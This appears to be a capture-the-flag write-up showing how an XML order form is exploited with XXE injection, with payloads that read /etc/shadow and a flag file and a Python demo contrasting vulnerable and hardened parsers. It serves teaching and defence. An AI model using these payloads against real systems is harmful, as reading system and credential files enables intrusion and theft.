OWASP Top 10 - baby WAFfles order


It will be an XXE injection (XML External Entity): the backend parses the order as XML, so a DOCTYPE that declares a SYSTEM entity pointing at a local file makes the parser read that file and place its contents wherever the entity is referenced.
https://portswigger.net/web-security/xxe
Let's use Burp Suite.
This is the original request:

Let's use the payloads from this list:
https://github.com/payloadbox/xxe-injection-payload-list

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>

The application expects an order with a table_num and a food element, so the payload has to use that structure, with the entity reference placed in the field that is reflected back (food):

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
<table_num>1</table_num>
<food>&ent;</food>
</order>

My payload was good but I had an error:

I need to change the Content-Type to application/xml. The server only hands the body to its XML parser when the Content-Type header says the body is XML; with the original header the DOCTYPE is never processed, so the entity is never resolved.
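As an added example (this is not code from the writeup or from the challenge, whose backend source is not shown), here is a minimal Python order handler that reproduces the whole chain: the Content-Type gate the writeup ran into, an XXE-vulnerable parser configuration beside the hardened one, and the writeup's payload parameterised on the file to read. The handler names, the flag text and the rule that only application/xml or text/xml bodies reach the parser are assumptions; the target file is a constructed temporary file standing in for /flag so the script runs offline.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class OrderHandler(xml.sax.ContentHandler):
    """Collect the text of <table_num> and <food> from an <order> body."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in ("table_num", "food"):
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        # Text pulled in through &ent; arrives here as well: that is the leak.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def parse_order(body: bytes, resolve_external_entities: bool) -> dict:
    """Parse an <order> body. True reproduces the XXE-vulnerable parser
    configuration; False is the hardened one."""
    parser = xml.sax.make_parser()
    # feature_external_ges decides whether <!ENTITY x SYSTEM "..."> is fetched.
    # Python has defaulted it to False since 3.7.1; many other XML stacks do not.
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    h = OrderHandler()
    parser.setContentHandler(h)
    parser.parse(io.BytesIO(body))
    return h.fields


def handle_request(content_type: str, body: bytes, vulnerable: bool = True) -> dict:
    """Assumed server behaviour (not the challenge's real code): the body only
    reaches the XML parser when the Content-Type says it is XML."""
    if content_type.split(";")[0].strip() not in ("application/xml", "text/xml"):
        return {"error": "expected an XML order"}
    return parse_order(body, resolve_external_entities=vulnerable)


def xxe_payload(target_uri: str, table_num: int = 1) -> bytes:
    """The writeup's payload, parameterised on the file to read.
    Note the classic limitation: a file containing '<' or '&' would break
    the parse, which is why /etc/shadow and a plain flag file work well."""
    return (
        '<?xml version="1.0" ?>\n'
        # A non-validating parser does not check the DOCTYPE name against the root.
        f'<!DOCTYPE order [<!ENTITY ent SYSTEM "{target_uri}"> ]>\n'
        "<order>\n"
        f"  <table_num>{table_num}</table_num>\n"
        "  <food>&ent;</food>\n"
        "</order>\n"
    ).encode()


def demo() -> dict:
    """Send the payload with the wrong Content-Type, then to the vulnerable and
    the hardened parser, against a constructed stand-in for /flag."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("THM{constructed_example_flag}")  # constructed sample, not a real flag
    try:
        body = xxe_payload(pathlib.Path(f.name).as_uri())
        return {
            "wrong_content_type": handle_request("application/x-www-form-urlencoded", body),
            "vulnerable": handle_request("application/xml", body, vulnerable=True),
            "hardened": handle_request("application/xml", body, vulnerable=False),
        }
    finally:
        os.unlink(f.name)


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Running it shows the three outcomes from the writeup in order: the form-encoded request is rejected before any XML is parsed, the vulnerable parser returns the file contents inside food, and the hardened parser (external entity resolution off) returns an empty food field for the same body.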